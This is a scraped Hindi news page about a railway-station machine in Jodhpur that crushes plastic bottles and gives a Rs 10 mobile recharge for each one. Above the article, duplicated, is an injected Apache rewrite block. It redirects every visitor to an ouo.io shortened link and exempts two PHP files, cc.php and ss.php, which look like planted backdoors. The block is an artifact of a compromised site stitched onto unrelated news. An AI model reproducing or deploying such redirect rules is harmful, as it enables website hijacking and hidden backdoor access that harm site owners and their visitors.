
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 645
जोधपुर। पूरी दुनिया इन दिनों प्रदूषण की समस्या से जूझ रही है लेकिन इस ओर कोई ध्यान नहीं दिया जा रहा है। यह प्रदूषण विशेषकर प्लास्टिक की खाली बोतल हो या फिर प्लास्टिक की खाली थैलियां। हालांकि प्लास्टिक से होने वाले प्रदूषण की रोकथाम के लिए राजस्थान सरकार कदम उठा रही है। इसके लिए सरकार ने प्लास्टिक की थैलियों पर कड़ाई से प्रतिबंध लगा दिया है। वहीं जोधपुर रेलवे स्टेशन पर पर्यावरण संरक्षण को बढ़ावा देने के लिए एक मशीन लगाई गई है। इसमें प्लास्टिक की खाली बोतल डालने पर आपको अपने मोबाइल पर दस रुपये का फ्री रिचार्ज मिल सकता है।
रेलवे की ओर से यह मशीन प्लास्टिक कचरा कम करने के लिए लगाई गई है। इस मशीन में प्लास्टिक की खाली बोतल डालने पर यह उसका चूरा बना देती है। इसका इस्तेमाल प्लास्टिक रीसाइकलिंग के लिए कर प्लास्टिक के अन्य उत्पाद बनाए जा सकते हैं। लोग इस मशीन के उपयोग के लिए प्रेरित हों, इसके लिए एक खाली बोतल डालने पर 10 रुपये का फ्री प्रोमो कार्ड दिए जाने की व्यवस्था की गई है। यह कार्ड आपको अपने मोबाइल पर एसएमएस के जरिये मिलेगा। एक मोबाइल नंबर पर अधिकतम तीन बार यह फायदा लिया जा सकेगा। रेलवे के वरिष्ठ जनसंपर्क अधिकारी गोपाल शर्मा ने बताया कि मशीन स्टेशन के प्रवेश द्वार के पास लगाई गई है, ताकि अधिक से अधिक लोग इस का उपयोग करें।